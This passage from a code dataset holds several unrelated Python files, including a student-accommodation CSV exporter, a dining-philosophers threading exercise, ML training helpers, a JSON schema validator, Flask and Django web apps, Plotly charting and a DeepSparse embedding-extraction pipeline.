scribe + \";\"\n except (NameError, TypeError):\n pass\n # Speech-to-text\n try:\n speech = el['accommodations']['7']['selected']['value']\n if speech == None:\n raise TypeError\n non_accom += speech + \";\"\n except (NameError, TypeError):\n pass\n\n non_accom = non_accom.replace(';;', ';')\n data['NonEmbeddedAccommodations'].append(non_accom)\n\n\n try:\n data['Other'].append('')\n except (NameError, TypeError):\n data['Other'].append('')\n\n\n\n col_order = [\n 'StudentIdentifier',\n 'StateAbbreviation',\n 'Subject',\n 'AmericanSignLanguage',\n 'ColorContrast',\n 'ClosedCaptioning',\n 'Language',\n 'Masking',\n 'PermissiveMode',\n 'PrintOnDemand',\n 'Zoom',\n 'StreamlinedInterface',\n 'TexttoSpeech',\n 'Translation',\n 'NonEmbeddedDesignatedSupports',\n 'NonEmbeddedAccommodations',\n 'Other',\n ]\n\n\n df = pd.DataFrame(data)\n df = df[col_order]\n\n \n response = Response(content_type='application/octet-stream')\n response.headers['Content-Disposition'] = 'attachment; filename=\"data.csv\"'\n response.charset = 'utf8'\n response.body = df.to_csv(index=False).encode(encoding='UTF-8',errors='strict')\n return response\n\n\n\ndef convertToCSV2(context, request):\n\n session = request.db\n\n students = json.loads(request.POST['json_data'])\n\n #students = request.json_body['students']\n\n fp = ''\n\n for el in students:\n fp += el['firstname']+','+el['lastname']+','+el['ssid']+','+el['school']+','+el['grade']+','+el['teacher']\n\n this_item = el['universal_tools']\n this_list = (\n 'Breaks', \n 'Calculator', \n 'Digital Notes' , \n 'English Dictionary', \n 'English Glossary', \n 'Expandable Passages', \n 'Global Notes', \n 'Highlighter', \n 'Keyboard Navigation', \n 'Mark for Review', \n 'Math Tools', \n 'Spell Check', \n 'Strikethrough', \n 'Writing Tools', \n 'Zoom'\n )\n for el2 in this_list:\n x = list(filter(lambda x: x['text'] == el2, this_item))[0]\n if (x['select'] == True):\n fp += ','+x['text']\n else:\n # unselected: emit a single empty field so the columns stay aligned\n fp += ','\n\n\n\n this_item = el['universal_tools_ne']\n this_list = (\n 'Breaks', \n 'Scratch Paper', \n 'Thesaurus' , \n 'English Dictionary', \n )\n for el2 in this_list:\n x = list(filter(lambda x: x['text'] == el2, this_item))[0]\n if (x['select'] == True):\n fp += ','+x['text']\n else:\n fp += ','\n\n\n this_item = el['ident_student_needs']\n this_list = (\n 'Individualized Education Program', \n '504 Plan', \n 'Educator(s) Recommendation', \n )\n for el2 in this_list:\n x = list(filter(lambda x: x['text'] == el2, this_item))[0]\n 
if (x['select'] == True):\n fp += ','+x['text']\n else:\n fp += ','\n\n\n fp += '\\n'\n\n response = Response(content_type='application/octet-stream')\n response.headers['Content-Disposition'] = 'attachment; filename=\"data.csv\"'\n response.charset = 'utf8'\n response.body = fp.encode(encoding='UTF-8',errors='strict')\n return response\n\n\ndef saveToJSON(context, request):\n\n #students = request.POST['json_data']\n students = request.json_body['students']\n\n #response = Response(content_type='application/octet-stream')\n #response = Response(content_type='text/plain;charset=utf-8')\n #date = datetime.datetime.now().strftime(\"%Y-%m-%d %H:%M:%S\")\n #response.headers['Content-Disposition'] = 'attachment; filename=\"save-'+date+'.json\"'\n #response.charset = 'utf8'\n #response.body = json.dumps(students).encode(encoding='UTF-8',errors='strict')\n #response.text = students\n return students\n\n\n\n\n\n\n\n","repo_name":"SmarterApp/ARI_Prototype","sub_path":"api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":28735,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"37878508054","text":"from threading import Thread, Lock\r\nfrom random import randint\r\nfrom time import sleep\r\nimport sys\r\n\r\ni = 1\r\n\r\nN = 5\r\nLEFT = (i+N-1)%N\r\nRIGHT = (i+1)%N\r\nTHINKING = 0\r\nHUNGRY = 1\r\nEATING = 2\r\n\r\nstate = []\r\n\r\nmutex = Lock()\r\nsem_fil = []\r\n\r\n\r\ndef test(i):\r\n global N\r\n global HUNGRY\r\n global EATING\r\n LEFT = (i + N - 1) % N\r\n RIGHT = (i + 1) % N\r\n # 'and' (not bitwise '&') is needed here: '&' binds tighter than '==' and breaks the guard\r\n if state[i] == HUNGRY and state[LEFT] != EATING and state[RIGHT] != EATING:\r\n state[i] = EATING\r\n print(\"Philosopher\", i, \"is eating!\")\r\n if sem_fil[i].locked() is True:\r\n sem_fil[i].release()\r\n\r\ndef pegar_garfo(i):\r\n global N\r\n global HUNGRY\r\n global EATING\r\n mutex.acquire()\r\n state[i] = HUNGRY\r\n print(\"Philosopher\", i, \"is hungry!\")\r\n test(i)\r\n mutex.release()\r\n sem_fil[i].acquire()\r\n\r\ndef por_garfo(i):\r\n global N\r\n global HUNGRY\r\n global EATING\r\n LEFT = (i + N - 1) % N\r\n RIGHT = (i + 1) % N\r\n mutex.acquire()\r\n state[i] = THINKING\r\n print(\"Philosopher\", i, \"is thinking!\")\r\n test(LEFT)\r\n test(RIGHT)\r\n mutex.release()\r\n\r\ndef pensar(i):\r\n float_rand=randint(0,1)\r\n sleep(float_rand)\r\n\r\ndef comer(i):\r\n float_rand =randint(0, 1)\r\n sleep(float_rand)\r\n\r\ndef acao_filosofo(j):\r\n while(True):\r\n pensar(j)\r\n pegar_garfo(j)\r\n comer(j)\r\n por_garfo(j)\r\n\r\nfor i in range(N):\r\n state.append(0)\r\n\r\n\r\n# initialize the semaphores (one per philosopher)\r\n\r\nfor i in range(N):\r\n sem_fil.append(Lock())\r\n\r\n# create the threads (philosophers)\r\n\r\nthreads = []\r\nfor i in range(N):\r\n threads.append(Thread(target=acao_filosofo, args=[i]))\r\n threads[i].start()","repo_name":"ErickPimentel/SistemasOperacionais","sub_path":"Roteiro 4/jantardosfilosofos.py","file_name":"jantardosfilosofos.py","file_ext":"py","file_size_in_byte":1617,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"33521953529","text":"from keras.models import Sequential\nfrom keras.layers import Dense\nfrom keras.utils import np_utils\nimport scipy\nfrom sklearn import neighbors\nfrom sklearn.metrics import confusion_matrix\nimport numpy as np\nfrom matplotlib import pyplot as plt\n\n\ndef knn_fit(trainX, trainy):\n clf = neighbors.KNeighborsClassifier(5, 'distance')\n clf.fit(trainX, trainy)\n return clf\n\ndef knn_test(clf, testX, testy):\n predictions = 
clf.predict(testX)\n c = confusion_matrix(testy, predictions)\n return c\n\ndef nn_fit(trainX, trainy):\n traincaty = np_utils.to_categorical(trainy)\n nout = traincaty.shape[1]\n print(\"NOUT: \", nout)\n\n model = Sequential()\n model.add(Dense(64, input_dim=62, activation='relu'))\n model.add(Dense(32, activation='relu'))\n model.add(Dense(16, activation='relu'))\n model.add(Dense(8, activation='relu'))\n model.add(Dense(nout, activation='softmax'))\n\n model.compile(loss=\"binary_crossentropy\", optimizer=\"adam\", metrics=[\"accuracy\"])\n model.fit(trainX, traincaty, epochs=40, batch_size=10)\n return model\n\ndef nn_test(model, testX, testy=None):\n predictions = model.predict(testX)\n predictions = predictions.argmax(axis=1)\n if testy is not None:\n scores = model.evaluate(testX, np_utils.to_categorical(testy))\n c = confusion_matrix(testy, predictions)\n return c\n else:\n return predictions\n\ndef fit_validate(X, y, fitfunc=knn_fit, testfunc=knn_test, display=False):\n Xy = np.hstack([X.T, y.T])\n np.random.shuffle(Xy)\n samples = int(Xy.shape[0]*0.75)\n trainX, trainy = Xy[:samples,:-1], Xy[:samples,-1]\n testX, testy = Xy[samples:,:-1], Xy[samples:,-1]\n\n model = fitfunc(trainX, trainy)\n c = testfunc(model, testX, testy)\n if display:\n plt.imshow(c)\n plt.show()\n return c, model\n\n","repo_name":"sddhrthrt/sidewalk_terrain_estimation","sub_path":"src/learn.py","file_name":"learn.py","file_ext":"py","file_size_in_byte":1731,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"23816180672","text":"import os\nimport json\nimport jsonschema\nfrom flask import current_app\n\n\n# Custom validators\ndef _required(validator, required, instance, schema):\n \"\"\"\n The JSON schema validator currently does not have a way to retrieve the name of a missing required property.\n This function is a workaround that appends the name to the schema_path.\n\n Source: https://github.com/Julian/jsonschema/issues/119\n\n :param validator: JSON Schema Draft 4\n :param required:\n :param instance:\n :param schema:\n :return:\n \"\"\"\n if not validator.is_type(instance, 'object'):\n return\n\n for index, requirement in enumerate(required):\n if requirement not in instance:\n error = jsonschema.ValidationError(\n '{0!r} is a required property'.format(requirement)\n )\n error.schema_path.append(index)\n yield error\n\n\n# Construct validator as extension of Json Schema Draft 4.\nValidator = jsonschema.validators.extend(\n validator=jsonschema.validators.Draft4Validator,\n validators={\n 'required': _required\n }\n)\n\n\ndef validate_json(data, schema_path, schema_name):\n \"\"\"\n Validate the provided data against the provided JSON schema.\n\n :param data: JSON data to be validated\n :param schema_path: path to schema\n :param schema_name: name of the schema\n :return: dictionary of key-value ({property: error message}) pairs for validation errors\n :rtype: dict\n \"\"\"\n errors = {}\n with open(os.path.join(\n current_app.config['SCHEMAS_DIRECTORY'],\n schema_path,\n \".\".join((schema_name, 'json'))), 'r') as fp:\n resolver = jsonschema.RefResolver(\n 'file://' + os.path.join(current_app.config['SCHEMAS_DIRECTORY'], schema_path), None)\n validator = Validator(json.load(fp), resolver=resolver)\n for error in validator.iter_errors(data):\n # get property name\n if error.schema_path[0] == \"anyOf\":\n for value in error.validator_value:\n for property_name in value[\"required\"]:\n if not data.get(property_name):\n errors[property_name] = 
[\"This field is required.\"]\n continue\n elif error.schema_path[0] == \"required\":\n property_name = error.validator_value[error.schema_path[1]]\n else:\n property_name = error.path[0]\n # get error message\n if error.schema_path[0] == \"required\":\n message = \"This field is required\"\n elif error.schema.get('error') is not None:\n message = error.schema['error'].get(error.validator, error.message)\n else:\n message = error.message\n # append error message\n if errors.get(property_name) is not None:\n errors[property_name].append(message)\n else:\n errors[property_name] = [message]\n return errors\n","repo_name":"CityOfNewYork/DORIS-Publications-Portal","sub_path":"app/resources/lib/schema_utils.py","file_name":"schema_utils.py","file_ext":"py","file_size_in_byte":3006,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"78"} +{"seq_id":"30288837076","text":"#If the bill was $150.00, split between 5 people, with 12% tip. \n\n#Each person should pay (150.00 / 5) * 1.12 = 33.6\n#Format the result to 2 decimal places = 33.60\n\n#Tip: There are 2 ways to round a number. You might have to do some Googling to solve this.💪\n\n#Write your code below this line 👇\n\n\nprint(\"Welcome to the tip calculator!\")\nbill = input(\"What was the total bill? \\n$\")\ntip = input(\"How much tip would you like to give? (Usually: 10%, 12%, or 15%) \\n%\")\npeople = input(\"How many people to split the bill? \\n\")\nresult = round((float(bill) / int(people) * (float(tip)/100 + 1)), 2)\nresult = \"{:.2f}\" .format(result)\nmessage = f\"Each person should pay: ${result}\"\n\nprint(message)","repo_name":"Bishamonka/Python","sub_path":"day-2.py","file_name":"day-2.py","file_ext":"py","file_size_in_byte":693,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"1065037604","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Tue Jun 20 13:39:48 2023\r\n\r\n@author: Ofek biton & Shahaf Malka\r\n\"\"\"\r\n\r\n# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Tue Jun 20 13:39:48 2023\r\n@author: Ofek biton & Shahaf Malka\r\n\"\"\"\r\n\r\nfrom flask import Flask, render_template, request\r\nimport pandas as pd\r\nimport numpy as np\r\nimport pickle\r\nimport os\r\n\r\napp = Flask(__name__)\r\n\r\nwith open('trained_model.pkl', 'rb') as file:\r\n model = pickle.load(file)\r\n\r\nwith open('preprocessor.pkl', 'rb') as file:\r\n preprocessor = pickle.load(file)\r\n \r\n \r\n@app.route('/')\r\ndef home():\r\n print(model.feature_names_in_)\r\n return render_template('index.html')\r\n\r\n@app.route('/predict', methods=['POST'])\r\ndef predict():\r\n city = request.form.get('City')\r\n property_type = request.form.get('type')\r\n hasParking = request.form.get('hasParking')\r\n hasAirCondition = request.form.get('hasAirCondition')\r\n handicapFriendly = request.form.get('handicapFriendly')\r\n hasMamad = request.form.get('hasMamad')\r\n room_number = request.form.get('room_number')\r\n area = request.form.get('Area')\r\n room_number= float(room_number)\r\n area = float(area)\r\n \r\n string_features = ['אילת', 'באר שבע', 'בית שאן', 'בת ים', 'גבעת שמואל', 'דימונה', 'הוד השרון', 'הרצליה', 'זכרון יעקב', 'חולון', 'חיפה', 'יהוד מונוסון', 'ירושלים', 'כפר סבא', 'מודיעין מכבים רעות', 'נהריה', 'נוף הגליל', 'נס ציונה', 'נתניה', 'פתח תקווה', 'צפת', 'קרית ביאליק', 'ראשון לציון', 'רחובות', 'רמת גן', 'רעננה', 'שוהם', 'תל אביב', 'בית פרטי', 'דו משפחתי', 'דירה בבניין', 'דירת גן', 'פנטהאוז']\r\n \r\n new_data = pd.DataFrame({\r\n 'City': 
[city],\r\n 'type': [property_type],\r\n 'room_number': [room_number],\r\n 'Area': [area],\r\n 'hasParking': [hasParking],\r\n 'hasAirCondition' : [hasAirCondition],\r\n 'hasMamad' : [hasMamad],\r\n 'handicapFriendly' : [handicapFriendly]\r\n })\r\n \r\n for feature in string_features:\r\n new_data[feature] = 0\r\n \r\n new_data_enc = preprocessor.transform(new_data)\r\n predicted_price = model.predict(new_data_enc)[0]\r\n text_output = f\"Predicted Property Value: {predicted_price:.2f}\"\r\n\r\n return render_template('index.html', prediction_text=text_output)\r\n\r\nif __name__ == \"__main__\":\r\n port = int(os.environ.get('PORT', 5000))\r\n \r\n app.run(host='0.0.0.0', port=port, debug=True)\r\n","repo_name":"Ofekbiton4/Final-assiment","sub_path":"api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":2598,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"11715898991","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat May 29 18:10:45 2021\n\n@author: ali_d\n\"\"\"\n\n# Inset Plots\n\nimport numpy as np \nimport pandas as pd \n\n\nfrom plotly.offline import init_notebook_mode, iplot, plot\nimport plotly as py\ninit_notebook_mode(connected=True)\nimport plotly.graph_objs as go\n\nimport matplotlib.pyplot as plt\n\ntimesData = pd.read_csv(\"timesData.csv\")\n\ndataframe = timesData[timesData.year == 2015]\n\n\ntrace1 = go.Scatter(\n x = dataframe.world_rank,\n #my x axis is the world rank\n \n y = dataframe.teaching,\n #my y axis is the teaching score\n \n name = \"teaching\",\n #my label name\n marker = dict(color = \"rgba(16,112,2,0.8)\"),\n )\n #my color and opacity\n\n\ntrace2 = go.Scatter(\n x=dataframe.world_rank,\n y=dataframe.income,\n xaxis='x2',\n yaxis='y2',\n name = \"income\",\n marker = dict(color = 'rgba(160, 112, 20, 0.8)'),\n)\n\n\ndata = [trace1,trace2]\n#I combine my traces inside data\n\nlayout = go.Layout(\n xaxis2=dict(\n domain=[0.6, 0.95],\n anchor='y2', \n ),\n yaxis2=dict(\n domain=[0.6, 0.95],\n anchor='x2',\n ),\n title = 'Income and Teaching vs World Rank of Universities'\n\n)\n#what sets this apart from the other plots is that two plots are nested inside each other\n#domain specifies the inset's position\n#anchor='y2' is what we use to draw the second plot\nfig = go.Figure(data=data, layout=layout)\n#I create my figure\niplot(fig)\n#I plot it\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"ALDOR99/BACK.END-FRONT.END-ALGORITHMS","sub_path":"Python-main/Data Visualization/plotly/10-Inset Plots.py","file_name":"10-Inset Plots.py","file_ext":"py","file_size_in_byte":1510,"program_lang":"python","lang":"tr","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"31321616922","text":"from django.shortcuts import render, redirect\nfrom rest_framework import status, permissions\nfrom rest_framework.decorators import api_view\nfrom django.contrib.auth.decorators import login_required\nfrom rest_framework.response import Response\nfrom django.http import JsonResponse\nfrom .models import Task\nfrom .serializers import TaskSerializer\nfrom .forms import TaskForm, UserForm\nfrom rest_framework import viewsets\nfrom django.contrib.auth.forms import UserCreationForm\nfrom django.contrib.auth import authenticate, login as auth_login\n\n\n# Create your views here.\n\n\nclass TaskViewSet(viewsets.ModelViewSet):\n queryset = Task.objects.all().order_by('status')\n serializer_class = TaskSerializer\n\n\ndef login(request):\n f = UserForm(request.POST)\n return render(request, 
"registration/login.html", {'form': f})\n\n\n@api_view(['GET'])\ndef view_all_tasks(request):\n ''' view all tasks '''\n tasks = Task.objects.all()\n serializer = TaskSerializer(tasks, many=True)\n # permissions_classes = (permissions.IsAuthenticatedOrReadOnly,)\n return Response(serializer.data)\n\n\n@api_view(['PUT'])\ndef edit_task_detail(request, detail_id):\n '''view all details for one task'''\n specific_task = Task.objects.get(id=detail_id)\n serializer = TaskSerializer(specific_task, many=False)\n # permissions_classes = (permissions.IsAuthenticatedOrReadOnly,)\n return Response(serializer.data)\n\n\n@api_view(['GET'])\n@login_required\ndef user_detail(request, user_id):\n '''view all tasks created by a specific user'''\n user_tasks = Task.objects.filter(owner_id=user_id)\n serializer = TaskSerializer(user_tasks, many=True)\n return Response(serializer.data)\n\n\n@api_view(['DELETE'])\n@login_required\ndef delete_task(request, detail_id):\n '''delete a single task'''\n trash_task = Task.objects.get(id=detail_id)\n if trash_task.delete():\n return redirect('/')\n else:\n return Response(status=status.HTTP_400_BAD_REQUEST)\n\n#\n@login_required\ndef new_task(request):\n '''loads the standalone form to create a new task'''\n user = request.user\n task_form = TaskForm()\n return render(request, \"tasks/create.html\", {\"task_form\": task_form, \"user\": user, \"test\": \"test\"})\n\n\ndef index(request):\n '''UI homepage'''\n '''loads form to create a new task'''\n user = request.user\n if request.method == 'POST':\n new_task = TaskForm(request.POST)\n if new_task.is_valid():\n task = new_task.save(commit=False)\n task.owner = request.user\n task.save()\n return redirect(\"tasks\")\n else:\n new_task = TaskForm()\n return render(request, \"tasks/index.html\", {'add_new': new_task, 'user': user, \"test\": 'test'})\n\n\n@api_view(['POST'])\ndef add_task_to_DB(request, form_info):\n ''' sends form info to db as a new task'''\n serializer = TaskSerializer(data=form_info)\n if serializer.is_valid():\n serializer.save()\n return JsonResponse(serializer.data)\n\n return JsonResponse(serializer.errors, status=400)\n\n\ndef signup(request):\n if request.method == 'POST':\n form = UserCreationForm(request.POST)\n if form.is_valid():\n form.save()\n username = form.cleaned_data.get('username')\n raw_password = form.cleaned_data.get('password1')\n user = authenticate(username=username, password=raw_password)\n auth_login(request, user)\n return redirect('login')\n else:\n form = UserCreationForm()\n return render(request, 'signup.html', {'form': form})\n\n\ndef edit(request, task_id):\n # t = Task.objects.get(id=task_id)\n # print(t)\n form = TaskForm()\n return render(request, 'tasks/edit.html', {'form': form})\n","repo_name":"ryan-semmler/trello_clone","sub_path":"tasks/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3577,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"74187385213","text":"# Definition for a binary tree node.\nclass TreeNode(object):\n def __init__(self, x):\n self.val = x\n self.left = None\n self.right = None\n\nclass Solution(object):\n def printTree(self, root):\n \"\"\"\n :type root: TreeNode\n :rtype: List[List[str]]\n \"\"\"\n h = self.height(root)\n w = pow(2, h) - 1\n res = [['' for _ in range(w)] for __ in range(h)]\n self.print_helper(res, 0, 0, w - 1, root)\n return res\n\n def print_helper(self, lists, d, start, end, root):\n if root:\n mid = (start + end ) >> 1\n lists[d][mid] = str(root.val)\n if root.left:\n self.print_helper(lists, d + 1, start, mid - 1, 
root.left)\n if root.right:\n self.print_helper(lists, d + 1, mid + 1, end, root.right)\n\n def height(self, root):\n return 0 if not root else 1 + max(self.height(root.left), self.height(root.right))\n\nroot = TreeNode(1)\nroot.left = TreeNode(2)\nroot.left.left = TreeNode(3)\nroot.left.left.left = TreeNode(4)\nroot.right = TreeNode(5)\ns = Solution()\nprint(s.printTree(root))","repo_name":"denghuichao/LeetCode-py","sub_path":"PrintBinaryTree.py","file_name":"PrintBinaryTree.py","file_ext":"py","file_size_in_byte":1131,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"37730052402","text":"from enum import Enum\nfrom typing import Any, List, Type, Union\n\nimport numpy\nfrom pydantic import BaseModel, Field\nfrom transformers.tokenization_utils_base import PaddingStrategy, TruncationStrategy\n\nfrom deepsparse import Pipeline\nfrom deepsparse.log import get_main_logger\nfrom deepsparse.transformers.helpers import truncate_transformer_onnx_model\nfrom deepsparse.transformers.pipelines import TransformersPipeline\n\n\n__all__ = [\n \"EmbeddingExtractionInput\",\n \"EmbeddingExtractionOutput\",\n \"TransformersEmbeddingExtractionPipeline\",\n]\n\n_LOGGER = get_main_logger()\n\n\nclass EmbeddingExtractionInput(BaseModel):\n \"\"\"\n Schema for inputs to transformers_embedding_extraction pipelines\n \"\"\"\n\n inputs: Union[str, List[str]] = Field(\n description=\"A list of sequences from which to get embeddings\"\n )\n\n\nclass EmbeddingExtractionOutput(BaseModel):\n \"\"\"\n Schema for transformers_embedding_extraction pipeline output.\n Values are in batch order\n \"\"\"\n\n # List[Any] is for accepting numpy arrays\n embeddings: Union[List[List[float]], List[Any]] = Field(\n description=\"The output of the model which is an embedded \"\n \"representation of the input\"\n )\n\n class Config:\n arbitrary_types_allowed = True\n\n\nclass ExtractionStrategy(str, Enum):\n \"\"\"\n Schema for supported extraction strategies\n \"\"\"\n\n per_token = \"per_token\"\n reduce_mean = \"reduce_mean\"\n reduce_max = \"reduce_max\"\n cls_token = \"cls_token\"\n\n @classmethod\n def to_list(cls) -> List[str]:\n return cls._value2member_map_\n\n\n@Pipeline.register(\n task=\"transformers_embedding_extraction\",\n task_aliases=[],\n default_model_path=(\"zoo:bert-large-wikipedia_bookcorpus-pruned90\"),\n)\nclass TransformersEmbeddingExtractionPipeline(TransformersPipeline):\n \"\"\"\n embedding extraction pipeline for extracting intermediate layer embeddings\n from transformer models\n\n example instantiation:\n ```python\n transformers_embedding_extraction_pipeline = Pipeline.create(\n task=\"transformers_embedding_extraction\",\n model_path=\"masked_language_modeling_model_dir/\",\n )\n results = transformers_embedding_extraction_pipeline(\n [\n \"the warriors have won the nba finals\"\n \"the warriors are the greatest basketball team ever\"\n ]\n )\n emb_1, emb_2 = results.embeddings\n # (expect emb_1 and emb_2 to have high cosine similiarity)\n ```\n\n :param model_path: sparsezoo stub to a transformers model or (preferred) a\n directory containing a model.onnx, tokenizer config, and model config\n :param engine_type: inference engine to use. Currently supported values include\n 'deepsparse' and 'onnxruntime'. Default is 'deepsparse'\n :param batch_size: static batch size to use for inference. Default is 1\n :param num_cores: number of CPU cores to allocate for inference engine. None\n specifies all available cores. 
Default is None\n :param scheduler: (deepsparse only) kind of scheduler to execute with.\n Pass None for the default\n :param input_shapes: list of shapes to set ONNX the inputs to. Pass None\n to use model as-is. Default is None\n :param alias: optional name to give this pipeline instance, useful when\n inferencing with multiple models. Default is None\n :param sequence_length: sequence length to compile model and tokenizer for.\n If a list of lengths is provided, then for each length, a model and\n tokenizer will be compiled capable of handling that sequence length\n (also known as a bucket). Default is 128\n :param emb_extraction_layer: if an int, the transformer layer number from\n which the embeddings will be extracted. If a string, the name of last\n ONNX node in model to draw embeddings from. If None, leave the model\n unchanged. Default is -1 (last transformer layer before prediction head)\n :param model_size: size of transformer model (size of hidden layer per token\n if the model is cut). Default is 768\n :param extraction_strategy: method of pooling embedding values. Currently\n supported values are 'per_token', 'reduce_mean', 'reduce_max' and 'cls_token'.\n Default is 'per_token'\n :param return_numpy: return embeddings a list of numpy arrays, list of lists\n of floats otherwise. Default is False\n :param context: context for engine. If None, then the engine will be initialized\n with 2 streams to make use of parallel inference of labels. Default is None\n \"\"\"\n\n def __init__(\n self,\n *,\n emb_extraction_layer: Union[int, str, None] = -1,\n model_size: int = 768,\n extraction_strategy: ExtractionStrategy = \"per_token\",\n return_numpy: bool = False, # to support Pydantic Validation\n **kwargs,\n ):\n self._emb_extraction_layer = emb_extraction_layer\n self._model_size = model_size\n self._extraction_strategy = extraction_strategy\n self._return_numpy = return_numpy\n\n if self._extraction_strategy not in ExtractionStrategy.to_list():\n raise ValueError(\n f\"Unsupported extraction_strategy {self._extraction_strategy}\"\n )\n\n super().__init__(**kwargs)\n\n @property\n def input_schema(self) -> Type[BaseModel]:\n \"\"\"\n :return: pydantic model class that inputs to this pipeline must comply to\n \"\"\"\n return EmbeddingExtractionInput\n\n @property\n def output_schema(self) -> Type[BaseModel]:\n \"\"\"\n :return: pydantic model class that outputs of this pipeline must comply to\n \"\"\"\n return EmbeddingExtractionOutput\n\n def setup_onnx_file_path(self) -> str:\n \"\"\"\n Performs setup done in pipeline parent class as well as truncating the\n model to an intermediate layer for embedding extraction\n\n :return: file path to the processed ONNX file for the engine to compile\n \"\"\"\n onnx_path = super().setup_onnx_file_path()\n\n if self._emb_extraction_layer is not None:\n (\n onnx_path,\n self.onnx_output_names,\n self._temp_model_directory,\n ) = truncate_transformer_onnx_model(\n onnx_path,\n emb_extraction_layer=self._emb_extraction_layer,\n hidden_layer_size=self._model_size,\n )\n else:\n _LOGGER.info(\"Skipping model truncation\")\n\n return onnx_path\n\n def parse_inputs(self, *args, **kwargs) -> BaseModel:\n \"\"\"\n :param args: ordered arguments to pipeline, either a input_schema object,\n a string text, or a list of inputs\n :param kwargs: keyword arguments to pipeline\n :return: pipeline arguments parsed into the given `input_schema`\n schema if necessary. 
If an instance of the `input_schema` is provided\n it will be returned\n \"\"\"\n if args and kwargs:\n raise ValueError(\n f\"{self.__class__} only support args OR kwargs. Found \"\n f\" {len(args)} args and {len(kwargs)} kwargs\"\n )\n\n if not args:\n return self.input_schema(**kwargs)\n if isinstance(args, str):\n return self.input_schema(inputs=[args[0]])\n if len(args) != 1:\n return self.input_schema(inputs=args)\n if isinstance(args[0], self.input_schema):\n return args[0]\n return self.input_schema(inputs=args[0])\n\n def process_inputs(self, inputs: EmbeddingExtractionInput) -> List[numpy.ndarray]:\n \"\"\"\n Tokenizes input\n\n :param inputs: inputs to the pipeline.\n :return: inputs of this model processed into a list of numpy arrays that\n can be directly passed into the forward pass of the pipeline engine\n \"\"\"\n if isinstance(inputs.inputs, str):\n inputs.inputs = [inputs.inputs]\n\n # tokenization matches https://github.com/texttron/tevatron\n tokens = self.tokenizer(\n inputs.inputs,\n add_special_tokens=True,\n padding=PaddingStrategy.MAX_LENGTH.value,\n truncation=TruncationStrategy.LONGEST_FIRST.value,\n return_tensors=\"np\",\n )\n\n # mask padding and cls_token\n pad_masks = tokens[\"input_ids\"] == self.tokenizer.pad_token_id\n cls_masks = tokens[\"input_ids\"] == self.tokenizer.cls_token_id\n\n return self.tokens_to_engine_input(tokens), {\n \"pad_masks\": pad_masks,\n \"cls_masks\": cls_masks,\n }\n\n def process_engine_outputs(\n self,\n engine_outputs: List[numpy.ndarray],\n pad_masks: numpy.ndarray,\n cls_masks: numpy.ndarray,\n ) -> BaseModel:\n \"\"\"\n Implements extraction_strategy from the intermediate layer and returns its value\n\n :param engine_outputs: list of numpy arrays that are the output of the engine\n forward pass\n :param pad_masks: mask of the padding token for each engine input\n :param cls_masks: mask of the cls token for each engine input\n :return: outputs of engine post-processed into an object in the `output_schema`\n format of this pipeline\n \"\"\"\n if isinstance(engine_outputs, list):\n engine_outputs = engine_outputs[0]\n\n embeddings = []\n assert len(engine_outputs) == len(pad_masks) == len(cls_masks)\n for engine_output, pad_mask, cls_mask in zip(\n engine_outputs, pad_masks, cls_masks\n ):\n # extraction strategy\n if self._extraction_strategy == ExtractionStrategy.per_token:\n embedding = engine_output\n if self._extraction_strategy == ExtractionStrategy.reduce_mean:\n masked_output = self._remove_1d_mask(\n engine_output, mask=(pad_mask | cls_mask)\n )\n embedding = masked_output.mean(axis=0)\n if self._extraction_strategy == ExtractionStrategy.reduce_max:\n masked_output = self._remove_1d_mask(\n engine_output, mask=(pad_mask | cls_mask)\n )\n embedding = masked_output.max(axis=0)\n if self._extraction_strategy == ExtractionStrategy.cls_token:\n embedding = engine_output[numpy.where(cls_mask)[0][0]]\n\n # flatten\n embedding = embedding.flatten()\n\n if not self._return_numpy:\n embedding = embedding.tolist()\n\n embeddings.append(embedding)\n\n return self.output_schema(embeddings=embeddings)\n\n @staticmethod\n def route_input_to_bucket(\n *args, input_schema: BaseModel, pipelines: List[Pipeline], **kwargs\n ) -> Pipeline:\n \"\"\"\n :param input_schema: The schema representing an input to the pipeline\n :param pipelines: Different buckets to be used\n :return: The correct Pipeline object (or Bucket) to route input to\n \"\"\"\n tokenizer = pipelines[-1].tokenizer\n tokens = tokenizer(\n input_schema.inputs,\n 
add_special_tokens=True,\n return_tensors=\"np\",\n padding=False,\n truncation=False,\n )\n input_seq_len = max(map(len, tokens[\"input_ids\"]))\n return TransformersPipeline.select_bucket_by_seq_len(input_seq_len, pipelines)\n\n def _remove_1d_mask(\n self, array: numpy.ndarray, mask: numpy.ndarray\n ) -> numpy.ndarray:\n # Helper function to mask out values from a 1 dimensional mask\n\n # :param array: array containing values to be masked out\n # :param mask: 1 dimensional mask\n # :return: numpy masked array\n array_masked = numpy.ma.masked_array(array)\n array_masked[mask] = numpy.ma.masked\n\n return array_masked\n","repo_name":"neuralmagic/deepsparse","sub_path":"src/deepsparse/transformers/pipelines/embedding_extraction.py","file_name":"embedding_extraction.py","file_ext":"py","file_size_in_byte":11878,"program_lang":"python","lang":"en","doc_type":"code","stars":2498,"dataset":"github-code","pt":"78"} +{"seq_id":"19888950067","text":"import os\nimport typing as t\n\n\ndef str_shape(shape: t.Sequence[int]) -> str:\n if not shape:\n raise ValueError('Shape was empty')\n return 